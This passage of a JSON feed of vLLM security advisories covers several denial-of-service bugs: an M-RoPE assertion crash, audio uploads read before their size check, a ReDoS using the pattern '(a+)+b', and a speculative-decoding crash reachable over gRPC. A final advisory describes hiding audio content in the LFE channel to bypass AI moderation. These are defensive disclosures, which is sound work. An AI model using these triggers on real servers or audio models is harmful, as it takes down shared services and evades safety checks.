\"/usr/local/lib/python3.12/dist-packages/vllm/v1/worker/gpu_model_runner.py\", line 1582, in _init_mrope_positions\n(EngineCore pid=351) ERROR 06-11 00:48:03 [core.py:1167]     assert req_state.prompt_token_ids is not None, (\n(EngineCore pid=351) ERROR 06-11 00:48:03 [core.py:1167]            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore pid=351) ERROR 06-11 00:48:03 [core.py:1167] AssertionError: M-RoPE requires prompt_token_ids to be available.\n(APIServer pid=1) ERROR 06-11 00:48:03 [async_llm.py:704] AsyncLLM output_handler failed.\n(APIServer pid=1) ERROR 06-11 00:48:03 [async_llm.py:704] Traceback (most recent call last):\n(APIServer pid=1) ERROR 06-11 00:48:03 [async_llm.py:704]   File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/async_llm.py\", line 660, in output_handler\n(APIServer pid=1) ERROR 06-11 00:48:03 [async_llm.py:704]     outputs = await engine_core.get_output_async()\n(APIServer pid=1) ERROR 06-11 00:48:03 [async_llm.py:704]               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1) ERROR 06-11 00:48:03 [async_llm.py:704]   File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/engine/core_client.py\", line 1030, in get_output_async\n(APIServer pid=1) ERROR 06-11 00:48:03 [async_llm.py:704]     raise self._format_exception(outputs) from None\n(APIServer pid=1) ERROR 06-11 00:48:03 [async_llm.py:704] vllm.v1.engine.exceptions.EngineDeadError: EngineCore encountered an issue. See stack trace (above) for the root cause.\n```\n\nAll requests using the `/v1/chat/completions` endpoints will have text/`prompt_token_ids` parts (corresponding to the chat template), and `prompt_embeds` parts are handled as mm_features. This method (rightly) filters out those `prompt_embeds` content parts as they are treated as text positions.\n\nA sufficient solution to type narrowing here without raising a fatal assertion is to instead replace the assertion with a using dummy token ids:\n\n```python\ndef _init_mrope_positions(self, req_state: CachedRequestState):\n    model = self.get_model()\n    assert supports_mrope(model), \"M-RoPE support is not implemented.\"\n    mrope_model = cast(SupportsMRoPE, model)\n\n    # Filter out prompt_embeds modality (text-only position info)\n    mrope_features = [\n        f for f in req_state.mm_features if f.modality != \"prompt_embeds\"\n    ]\n    \n    # Handle both token_ids and embeddings-only inputs\n    if req_state.prompt_token_ids is not None:\n        input_tokens = req_state.prompt_token_ids\n    elif req_state.prompt_embeds is not None:\n        # For text-only embeddings, dummy token IDs are safe since\n        # get_mrope_input_positions only uses len(input_tokens) when mm_features is empty\n        seq_len = req_state.prompt_embeds.shape[0]\n        input_tokens = list(range(seq_len))\n        # Verify no mm_features remain (should be true after prompt_embeds filter)\n        assert len(mrope_features) == 0, (\n            \"M-RoPE with prompt_embeds-only input should have no multimodal features\"\n        )\n    else:\n        raise ValueError(\n            \"M-RoPE requires either prompt_token_ids or prompt_embeds.\"\n        )\n\n    req_state.mrope_positions, req_state.mrope_position_delta = (\n        mrope_model.get_mrope_input_positions(\n            input_tokens,\n            mrope_features,\n        )\n    )\n```\n\nTechnically, in isolation, this method still crashes in the case where `req_state.prompt_token_ids is None and req_state.mm_features`, so the solution above still leaves that potential vector open. As far as can be determined, however, such a `req_state` is impossible in the first place in online mode, because it would require a `/v1/completions` request with `prompt_embeds` AND multimodal features, but the `/v1/completions` request schema does not expose multimodal inputs in any discernible way. Today, those are the only two endpoints with `prompt_embeds` support. \n\nWhen in offline mode, it *is technically* possible to directly create an `EngineCoreRequest` that has `prompt_embeds and not prompt_token_ids and mm_features`, and pass that to `LLM.generate`. That would trigger this same assertion, and no validation would prevent that combination. It is strongly suspected, though, that this combination would be undefined in any model that support M-RoPE, because it would not be possible to determine which token positions correspond to `mm_features`. The proposed solution above would end up not setting `req_state.mrope_positions` and `req_state.mrope_position_delta` in this scenario, which could result in undefined behavior.\n\n`prompt_embeds` is far more familiar here than M-RoPE, and it is understood that each model that supports it is responsible for defining its own `get_mrope_input_positions` which have varying implementations. There is insufficient knowledge to be prescriptive in how the two features should interact in the offline case, other than possibly raising a validation error earlier on preventing that combination (which would emulate the current assertion behavior). Regardless, in offline mode, the chances of a remote user being able to exploit this are slim-to-nil compared to the online case which is incredibly straightforward.\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\n- Denial of Service caused by an incorrect assertion inside of the `GPUModelRunner` which causes a fatal EngineCore exception\n- Any configuration with `--enable-prompt-embeds` and M-RoPE-supported model is vulnerable\n- The attack is extremely easy from the remote attacker's perspective (copying the official `prompt_embeds` online mode docs examples almost-verbatim, accounting for model-name and connection details, of course, will induce a guaranteed shutdown)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-07-20T19:13:07.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-33cg-gxv8-3p8g","https://nvd.nist.gov/vuln/detail/CVE-2026-55514","https://github.com/vllm-project/vllm/pull/45252","https://github.com/vllm-project/vllm/commit/470229c37efaf69c86e8bc97482b0b1ff7551c65","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2303.yaml","https://github.com/vllm-project/vllm/releases/tag/v0.24.0","https://github.com/advisories/GHSA-33cg-gxv8-3p8g"],"source_kind":"github","identifiers":["GHSA-33cg-gxv8-3p8g","CVE-2026-55514"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-20T20:00:08.719Z","updated_at":"2026-09-23T10:01:30.590Z","epss_percentage":0.00665,"epss_percentile":0.4951,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zM2NnLWd4djgtM3A4Z84ABcPt","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zM2NnLWd4djgtM3A4Z84ABcPt","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.24.0","vulnerable_version_range":"\u003e= 0.12.0, \u003c 0.24.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zM2NnLWd4djgtM3A4Z84ABcPt/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12ODJnLTI0MzctNjdtMs4ABbGy","url":"https://github.com/advisories/GHSA-v82g-2437-67m2","title":"vLLM: Speech-to-text upload size limit is enforced after full UploadFile read","description":"## Summary\n\nCurrent-head vLLM documents `VLLM_MAX_AUDIO_CLIP_FILESIZE_MB` as the maximum audio file size accepted by the speech-to-text APIs. The default is 25 MB. `vllm/envs.py` also describes files larger than this value as rejected.\n\nThe `/v1/audio/transcriptions` and `/v1/audio/translations` routes call `await request.file.read()` before vLLM checks that limit. In FastAPI and Starlette, `UploadFile.read()` returns bytes from the uploaded file object; when called without a size argument, the route materializes the remaining file contents. vLLM then performs the compressed file-size check later in `_preprocess_speech_to_text()` against the already-created `bytes` object.\n\nAs a result, the documented compressed audio file-size limit does not bound the memory allocated by vLLM endpoint code before validation. An oversized multipart upload can cause vLLM to allocate memory proportional to the uploaded file size before rejecting the request as too large.\n\nThis is distinct from `GHSA-6pr9-rp53-2pmc`, which covered decoded PCM expansion after compressed input was accepted. This report covers compressed upload materialization before compressed-size validation.\n\n## Technical Details\n\nThe upload routes perform an unbounded read before vLLM checks the documented compressed audio file-size limit:\n\n- `vllm/entrypoints/speech_to_text/transcription/api_router.py`: `audio_data = await request.file.read()`\n- `vllm/entrypoints/speech_to_text/translation/api_router.py`: `audio_data = await request.file.read()`\n- `vllm/entrypoints/speech_to_text/base/serving.py` later checks: `if len(audio_data) / 1024**2 \u003e self.max_audio_filesize_mb`\n\nThere is no route-level check of `request.file.size`, `Content-Length`, a bounded `read(max_bytes + 1)`, or a streaming copy that stops at the configured limit before the full file is materialized.\n\nThis does not appear to be intended behavior. vLLM's security guide treats request-controlled resource use as a security boundary: for example, requests that exceed `VLLM_MAX_N_SEQUENCES` are rejected before reaching the engine. The speech-to-text upload limit is documented in the same spirit as an API enforced limit, but the first vLLM check happens after the over-limit upload has already been copied into a `bytes` object.\n\n## Impact\n\nAttack requirements:\n\n- the deployment exposes `/v1/audio/transcriptions` or `/v1/audio/translations`;\n- a speech-to-text capable model/task is configured; and\n- the caller can submit requests to the endpoint, including any API key the deployment requires.\n\nAn API caller who meets those requirements can send an oversized audio file. vLLM reads the full uploaded file into memory before applying the configured compressed audio file-size limit. This can create memory pressure or, depending on process/container limits and concurrency, terminate the process before the request is rejected.\n\nSuggested severity: Moderate, `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H` (`6.5`), CWE-770/CWE-400.\n\nThe impact is availability-only. This is not a claim of code execution, data access, cross-tenant data exposure, parser-level multipart memory exhaustion, or persistence after process restart. Deployment body-size limits at a reverse proxy or ASGI layer can mitigate the issue before vLLM sees the request, but vLLM's own documented file-size limit does not currently provide that memory boundary.\n\n## Suggested Fix\n\nEnforce the compressed audio upload limit before the unbounded read:\n\n- Check reliable upload size metadata before reading when available.\n- Read at most `max_bytes + 1` bytes in chunks as a defense-in-depth guard against missing or unreliable metadata.\n- Share the helper between transcription and translation routes.\n- Add regression tests that prove an over-limit `UploadFile` is rejected without calling an unbounded `read()`.\n\nThe important property is that over-limit compressed uploads are rejected before vLLM allocates the full uploaded file as `bytes`.\n\n## Resources\n\n- vLLM security policy: `https://github.com/vllm-project/vllm/security/policy`\n- vLLM speech-to-text docs: `https://docs.vllm.ai/en/latest/serving/online_serving/speech_to_text/`\n- vLLM security guide, request parameter resource limits: `https://docs.vllm.ai/en/latest/usage/security/`\n- vLLM vulnerability management docs: `https://docs.vllm.ai/en/latest/contributing/vulnerability_management/`\n- FastAPI file uploads: `https://fastapi.tiangolo.com/reference/uploadfile/`\n- Starlette uploaded files: `https://www.starlette.io/requests/`\n- Adjacent published audio advisory: `https://github.com/vllm-project/vllm/security/advisories/GHSA-6pr9-rp53-2pmc`\n- Request-parameter resource DoS precedent: `https://github.com/vllm-project/vllm/security/advisories/GHSA-3mwp-wvh9-7528`\n\n## Appendix: Affected Version\n\nValidated against current head:\n\n- commit: `1033ffac2eccf986fdd880f4dee64ca3b22c63c9`\n- described version: `v0.22.1rc0-491-g1033ffac2e`\n\nKnown affected range: current head. It has not been determined the introducing commit or release range.\n\n## Appendix: Proof Of Vulnerability\n\nThe attached proof is a non-destructive static probe. It does not upload a large file or contact a running vLLM server:\n\n```bash\npython3 attached-evidence/poc/audio_upload_size_precheck_probe.py\n```\n\nObserved result:\n\n```json\n{\n  \"pov\": \"this report\",\n  \"validated\": true,\n  \"default_limit_mb\": 25,\n  \"documented_api_limit\": true,\n  \"routes\": {\n    \"transcription_route\": {\n      \"unbounded_upload_read\": true,\n      \"early_size_guard_before_read\": false,\n      \"chunked_bounded_read\": false\n    },\n    \"translation_route\": {\n      \"unbounded_upload_read\": true,\n      \"early_size_guard_before_read\": false,\n      \"chunked_bounded_read\": false\n    }\n  },\n  \"late_size_check\": {\n    \"present\": true\n  }\n}\n```\n\nExpected behavior: vLLM rejects over-limit audio files before materializing the entire upload into memory in vLLM endpoint code.\n\nActual behavior: the route materializes the upload into memory first, and only then does vLLM reject the request as exceeding `VLLM_MAX_AUDIO_CLIP_FILESIZE_MB`.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-07-17T17:16:17.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-v82g-2437-67m2","https://nvd.nist.gov/vuln/detail/CVE-2026-55646","https://github.com/vllm-project/vllm/pull/45510","https://github.com/vllm-project/vllm/commit/b997071ec493765abbed990c65843ed05e4708a8","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2305.yaml","https://github.com/advisories/GHSA-v82g-2437-67m2"],"source_kind":"github","identifiers":["GHSA-v82g-2437-67m2","CVE-2026-55646"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-17T18:00:08.705Z","updated_at":"2026-09-25T12:01:52.459Z","epss_percentage":0.00519,"epss_percentile":0.41589,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12ODJnLTI0MzctNjdtMs4ABbGy","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12ODJnLTI0MzctNjdtMs4ABbGy","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.24.0","vulnerable_version_range":"\u003e= 0.22.0, \u003c 0.24.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12ODJnLTI0MzctNjdtMs4ABbGy/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yd3h4LW1yam0td2Mybc4ABbGx","url":"https://github.com/advisories/GHSA-rwxx-mrjm-wc2m","title":"vLLM: ReDoS via structured_outputs.regex compiled without timeout in xgrammar and outlines backends","description":"## Summary\n\nThe `structured_outputs.regex` API parameter passes a user-supplied regex string directly to grammar compiler backends with no compilation timeout. In the xgrammar backend, the string reaches `compile_regex()` with no guard. In the outlines backend, `validate_regex_is_buildable()` blocks structural issues (lookarounds, backreferences) but provides zero protection against exponential DFA state-space explosion. Patterns like `(a+)+b` pass all checks and hang the inference worker.\n\n## Root Cause\n\n`backend_xgrammar.py:91` — no timeout:\n```python\nctx = self.compiler.compile_regex(grammar_spec)\n```\n\n`backend_outlines.py:299–330` — structural checks only, no complexity analysis:\n```python\ndef validate_regex_is_buildable(regex: str) -\u003e None:\n    sre_parse.parse(regex)   # AST parse only — does not detect exponential patterns\n    _check_unsupported(...)  # blocks lookarounds/backrefs, not nested quantifiers\n```\n\n`backend_outlines.py:64` — no timeout:\n```python\noc.Index(regex_string, vocabulary.inner)\n```\n\n## Impact\n\nDenial of service — one request with an adversarial regex pattern hangs an inference worker indefinitely.\n\n## Remediation\n\nWrap `compile_regex()` and `oc.Index()` calls in a thread with a deadline (e.g., 5 seconds). Add complexity analysis to `validate_regex_is_buildable()` to detect nested quantifier patterns before compilation.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-07-17T17:10:37.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-rwxx-mrjm-wc2m","https://nvd.nist.gov/vuln/detail/CVE-2026-55574","https://github.com/vllm-project/vllm/pull/45118","https://github.com/vllm-project/vllm/commit/2b3006076c5e9bc4cda9e03e3641388de3c5c286","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2304.yaml","https://github.com/advisories/GHSA-rwxx-mrjm-wc2m"],"source_kind":"github","identifiers":["GHSA-rwxx-mrjm-wc2m","CVE-2026-55574"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-17T18:00:08.705Z","updated_at":"2026-09-28T20:01:49.021Z","epss_percentage":0.00583,"epss_percentile":0.45566,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yd3h4LW1yam0td2Mybc4ABbGx","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yd3h4LW1yam0td2Mybc4ABbGx","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.24.0","vulnerable_version_range":"\u003c 0.24.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yd3h4LW1yam0td2Mybc4ABbGx/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04d3I1LWptMmgtOHI0Zs4ABbGw","url":"https://github.com/advisories/GHSA-8wr5-jm2h-8r4f","title":"vLLM has Remote DoS via Invalid Recovered Token Reinjection","description":"## Summary\n\nA frontend-legal multi-request speculative workload can make vLLM produce an out-of-vocabulary recovered token equal to `vocab_size`, convert that value to `-1` when choosing the next live token for a request, and then feed that `-1` back into the next drafter input ids. On Qwen3 GPTQ this reaches the worker-side drafting / attention path and crashes the engine with a GPU `device-side assert`.\n\nThe same issue is reachable through the public gRPC request surface by sending a specific overlapping `Generate` / `Abort` sequence.\n\n## Impact\n\n- A remote client that can send public gRPC generation requests can crash the\n  shared vLLM engine worker\n- The triggering request sequence aborts concurrent requests and prevents later\n  requests from completing until the worker is restarted\n- In shared deployments, this is a service-wide denial of service for other\n  clients, not just a failure isolated to the attacking requests\n- The failure is reproducible, so repeated request sequences can sustain the\n  outage\n\n## Affected version\n\n- Confirmed on vLLM `0.17.1`\n- Earlier and later versions have not been checked yet in this report\n\n## Repro model\n\n- Official Hugging Face repo:\n  - [`Qwen/Qwen3-0.6B-GPTQ-Int8`](https://huggingface.co/Qwen/Qwen3-0.6B-GPTQ-Int8)\n- Anyone wants to reproduce the bug with my PoC scripts should download `Qwen3-0.6B-GPTQ-Int8` first\n\n## Trigger chain\n\n1. A legal multi-request speculative workload keeps structured-output state,\n   speculative decoding, overlap, and request cancellation active in the same\n   live engine.\n2. During rejection sampling, vLLM produces a recovered token equal to the\n   model `vocab_size` boundary value.\n3. That recovered token appears in position 0 of the sampled speculative row\n   for a live request. The same row also contains trailing padding entries\n   equal to `-1`, but those padding entries are not the key fault by\n   themselves.\n4. The next-token preparation step treats the position-0 recovered token as the\n   real next token for that request and converts that out-of-vocabulary value\n   to `-1`.\n5. The drafter writes that converted `-1` back into the live next-step input-id\n   row for the request.\n6. The drafting / embedding / attention path later consumes that live invalid\n   token and the worker crashes on GPU.\n\n## Details\n\n### Simple example\n\nThe important distinction is:\n\n- trailing `-1` values in a speculative row can be ordinary padding\n- the bug appears when the first live token for a request becomes\n  `151936 == vocab_size`, and that live token is then converted into `-1`\n\nIn simplified form, the bad transition looks like this:\n\n```text\nsampled speculative row:\n[151936, -1, -1, -1, ...]\n```\n\nAt this point, the trailing `-1` values are only padding. The critical problem\nis that the first position holds `151936`, which is out of vocabulary and is\nbeing treated as the request's real next token.\n\nThen vLLM prepares the next-token buffer:\n\n```text\nnext_token_ids:\n[-1, ...]\n```\n\nFinally, that converted `-1` is written back into the live model input ids:\n\n```text\ninput_ids_after:\n[-1, 0, 0, 0, ...]\n```\n\nThe crash happens because the live next token became `-1` and was later consumed by the drafting / embedding / attention path, not merely because the speculative row contained padded `-1` entries.\n\n### Trigger path in code\n\n1. The workload is frontend-legal. The requests use normal `SamplingParams`\n   features such as structured outputs, `stop`, `bad_words`, `min_tokens`, and\n   streaming overlap. No malformed token-id list is required at the request\n   boundary.\n2. In speculative decoding, the rejection sampler can generate recovered tokens\n   when drafted tokens are rejected.\n   ```python\n   # vllm/v1/sample/rejection_sampler.py\n   def sample_recovered_tokens(...):\n       recovered_token_ids = torch.empty_like(draft_token_ids)\n       sample_recovered_tokens_kernel[(batch_size, max_spec_len)](...)\n       return recovered_token_ids\n   ```\n   On the verified Qwen3 run, the recovered-token trace shows\n   `recovered_token_ids[0] = 151936`, which is exactly `vocab_size` for this\n   checkpoint.\n3. The speculative proposer then prepares the next-token row from the sampled\n   speculative row.\n   ```python\n   # vllm/v1/spec_decode/eagle.py\n   def prepare_next_token_ids_padded(...):\n       ...\n       eagle_prepare_next_token_padded_kernel[grid](\n           sampled_token_ids,\n           discard_request_mask,\n           backup_tokens_gpu,\n           next_token_ids,\n           valid_sampled_tokens_count,\n           gpu_input_batch.vocab_size,\n           ...\n       )\n       return next_token_ids, valid_sampled_tokens_count\n   ```\n   In the verified trace, this step receives a sampled row beginning with\n   `151936`, followed by `-1` padding. The important point is that `151936`\n   occupies the first live token position for the request. This step then\n   produces `next_token_ids[0] = -1`, meaning the live next token for the\n   request has been converted to `-1`.\n4. The drafter then rotates the draft input ids and inserts those\n   `next_token_ids` back into the live input-id buffer.\n   ```python\n   # vllm/v1/spec_decode/eagle.py\n   def set_inputs_first_pass(...):\n       ...\n       self.input_ids[token_indices_to_sample] = next_token_ids\n   ```\n   In the verified trace, this produces `input_ids_after[0] = -1`.\n5. The model-side embed path later consumes those input ids.\n   ```python\n   # vllm/model_executor/models/qwen2.py\n   def embed_input_ids(self, input_ids: torch.Tensor) -\u003e torch.Tensor:\n       return self.embed_tokens(input_ids)\n   ```\n   In the verified trace, this is the first point where the converted `-1`\n   becomes visible as a real model input. The bug is not merely that the\n   sampled speculative row contained padding `-1`; the bug is that the live\n   next token for the request became `-1` and was written back into input ids.\n6. After that point, the visible sink depends on timing and backend state. On\n   the attached Qwen3 reproducer, the engine commonly dies later in the\n   drafting / attention path with `CUDA error: device-side assert triggered`,\n   for example under `flash_attn_varlen_func(...)`.\n\n### Local script breakdown\n\n`repro_g4_recovered_minus1_local.py` is a standalone local reproducer.\n\n- It reads the Qwen3 checkpoint path from `VLLM_POC_G4_MODEL` or the built-in\n  `/path/to/qwen3` placeholder\n- It creates `EngineCore` directly without any external helper dependency\n- It submits one fixed multi-request workload that preserves the same overlap\n  and speculative-decoding state needed for the bug\n- It writes:\n  - `request_payloads.json`\n  - `repro_config.json`\n  - `timeline.json`\n  - `responses.json`\n  - `error.txt`\n  - `recovered_chain_trace.jsonl`\n- `recovered_chain_trace.jsonl` is the key attribution artifact. It records the\n  recovered-token chain directly from the standalone reproducer\n\n### gRPC script breakdown\n\n`repro_g4_recovered_minus1_grpc.py` is a standalone public gRPC reproducer.\n\n- It reads the Qwen3 checkpoint path from `VLLM_POC_G4_MODEL` or the built-in\n  `/path/to/qwen3` placeholder\n- It starts a temporary `vllm.entrypoints.grpc_server` process\n- It sends only public `Generate` and `Abort` RPCs\n- It submits one fixed overlapping request sequence that preserves the same\n  speculative-decoding state needed for the bug\n- After the crash window, it sends one more public `Generate` probe request to\n  confirm that later gRPC requests also fail after the worker dies\n- It writes:\n  - `request_payloads.json`\n  - `timeline.json`\n  - `server_command.json`\n  - `responses.json`\n  - `post_crash_probe.json`\n  - `server.stdout.log`\n  - `server.stderr.log`\n\n## Observed result\n\nLocal repro typically ends with:\n\n- a recovered-token trace showing:\n  - `sample_recovered_tokens_return -\u003e recovered_token_ids[0] = 151936`\n  - `prepare_next_token_ids_padded -\u003e next_token_ids[0] = -1`\n  - `set_inputs_first_pass -\u003e input_ids_after[0] = -1`\n  - `embed_input_ids_out_of_range -\u003e input_ids[0] = -1`\n- `CUDA error: device-side assert triggered`\n- a fatal engine-side failure\n\ngRPC repro typically ends with:\n\n- the triggering gRPC requests failing with\n  `INTERNAL: EngineCore encountered an issue. See stack trace (above) for the root cause.`\n- server logs showing the worker dies with\n  `CUDA error: device-side assert triggered`\n- a later public probe request also failing after the worker is dead\n\nThis demonstrates that the issue is reachable through the public gRPC request surface, not only through a local reproducer.\n\n## Log snippets\n\n### Local recovered-chain trace\n\n```text\nsample_recovered_tokens_return:\n  recovered_token_ids = [151936, ...]\n  vocab_size = 151936\n\nprepare_next_token_ids_padded:\n  sampled_token_ids_head = [[151936, -1, -1, ...], ...]\n  next_token_ids = [-1, ...]\n\nset_inputs_first_pass:\n  input_ids_after = [-1, 0, 0, 0, ...]\n\nembed_input_ids_out_of_range:\n  input_ids = [-1, 0, 0, 0, ...]\n```\n\n### gRPC server log\n\n```text\ntorch.AcceleratorError: CUDA error: device-side assert triggered\n...\nvllm.v1.engine.exceptions.EngineDeadError: EngineCore encountered an issue. See stack trace (above) for the root cause.\n...\nError in Generate for request post_crash_probe\nvllm.v1.engine.exceptions.EngineDeadError: EngineCore encountered an issue. See stack trace (above) for the root cause.\n```\n\n## Root cause\n\nThis is a speculative-decoding state-handling bug, not an invalid frontend token-id input bug.\n\nThe root cause is that a recovered speculative token can become equal to `vocab_size`, then be selected as the live next token for a request, then be converted to `-1`, and that converted `-1` is still written back into live drafter input ids and later consumed by the drafting / embedding / attention path.\n\nFor the Qwen3 checkpoint used here:\n\n- `151936 == vocab_size`\n\nThis value should be described as the model `vocab_size` boundary value, not as a legal token id.\n\n## Attachments\n\nThe attached bundle for this report should contain:\n\n- `repro_g4_recovered_minus1_local.py`\n- `repro_g4_recovered_minus1_grpc.py`\n\nThese two standalone scripts are sufficient to reproduce the issue and its public gRPC reachability.\n\n## Fix\n\nA fix for this vulnerability has been merged in: https://github.com/vllm-project/vllm/pull/44744","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-07-17T17:08:03.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-8wr5-jm2h-8r4f","https://nvd.nist.gov/vuln/detail/CVE-2026-54234","https://github.com/vllm-project/vllm/pull/44744","https://github.com/vllm-project/vllm/commit/8a5cf1ccd65e8ac7635c402c1ec0b08988bc26ca","https://github.com/advisories/GHSA-8wr5-jm2h-8r4f"],"source_kind":"github","identifiers":["GHSA-8wr5-jm2h-8r4f","CVE-2026-54234"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-17T18:00:08.705Z","updated_at":"2026-10-02T15:01:58.027Z","epss_percentage":0.00616,"epss_percentile":0.47553,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04d3I1LWptMmgtOHI0Zs4ABbGw","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04d3I1LWptMmgtOHI0Zs4ABbGw","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.24.0","vulnerable_version_range":"\u003e= 0.17.1, \u003c 0.24.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04d3I1LWptMmgtOHI0Zs4ABbGw/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02YzRyLWZtaDMtN3JoOM4ABbGv","url":"https://github.com/advisories/GHSA-6c4r-fmh3-7rh8","title":"vLLM: Processing differential in multi-channel audio downmixing enables hidden-input/moderation bypass for audio models","description":"## Issue Description\nLibrosa defaults to using `numpy.mean` for mono downmixing (`to_mono`), while the international standard ITU-R BS.775-4 specifies a weighted downmixing algorithm. This discrepancy results in:\n- Inconsistency between audio heard by humans (e.g., through headphones/regular speakers) and audio processed by AI models (Which infra via Librosa, such as vllm, transformer).\n\nhttps://github.com/librosa/librosa/blob/af8c839fb15317fa2712ea66e7a22da6a9267b32/librosa/core/audio.py#L478\n## Attack Scenario and Impact\n\n### LFE (Low-Frequency Effects) Channel Exploit\nAttackers can craft special multichannel audio files containing:\n1. Normal content in front channels (L/R)\n2. Either interference signals or hidden content in the LFE channel\n\n**Notice:** It is worth noting that not only the LFE channel is excluded, but in fact, channels beyond the 6th (such as rear surround channels, overhead channels, height speakers, etc.) are also not supported.\n\n**Attack Methodology:**\n\nAttackers can create specially engineered multichannel audio with LFE interference, where front channels (L/R) contain normal content while the LFE channel carries interference signals or hidden content. When played on consumer devices that ignore LFE channels, only the normal content is heard. However, when processed by AI systems using Librosa (which mixes all channels), the LFE interference affects speech recognition feature extraction or masks critical detection features. This enables malicious content to bypass AI detection while still reaching end users, potentially compromising voice authentication systems, evading content moderation, or disrupting speech recognition accuracy.\n\n**Potential Exploitation Scenarios:**\n- Voice authentication systems may be tricked into accepting anomalous audio\n- Content moderation systems may fail to detect prohibited content hidden in LFE channels \n- Speech recognition systems may produce incorrect transcriptions\n\n**Note:** `torch.audio` implements this correctly. Failure to do so may lead to inconsistencies between training and test audio, resulting in performance degradation.\n\n\n## Resources\n\n- [ITU-R BS.775-4 Standard](https://www.itu.int/dms_pubrec/itu-r/rec/bs/R-REC-BS.775-4-202212-I!!PDF-E.pdf)\n- [Librosa Source Code](https://github.com/librosa/librosa/blob/af8c839fb15317fa2712ea66e7a22da6a9267b32/librosa/core/audio.py#L478)\n- [Librosa securty report](https://github.com/librosa/librosa/security/advisories/GHSA-vfm7-86xr-5mrh)\n\n## Fixes\n\n- https://github.com/vllm-project/vllm/pull/37058, which removes the librosa dependency from vLLM.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-07-17T16:52:53.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.9,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-6c4r-fmh3-7rh8","https://nvd.nist.gov/vuln/detail/CVE-2026-34760","https://github.com/vllm-project/vllm/pull/37058","https://github.com/vllm-project/vllm/commit/c7f98b4d0a63b32ed939e2b6dfaa8a626e9b46c4","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2299.yaml","https://github.com/vllm-project/vllm/releases/tag/v0.18.0","https://github.com/advisories/GHSA-6c4r-fmh3-7rh8"],"source_kind":"github","identifiers":["GHSA-6c4r-fmh3-7rh8","CVE-2026-34760"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-07-17T17:00:09.423Z","updated_at":"2026-09-28T20:01:49.022Z","epss_percentage":0.00476,"epss_percentile":0.38547,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02YzRyLWZtaDMtN3JoOM4ABbGv","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02YzRyLWZtaDMtN3JoOM4ABbGv","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.18.0","vulnerable_version_range":"\u003e= 0.5.5, \u003c 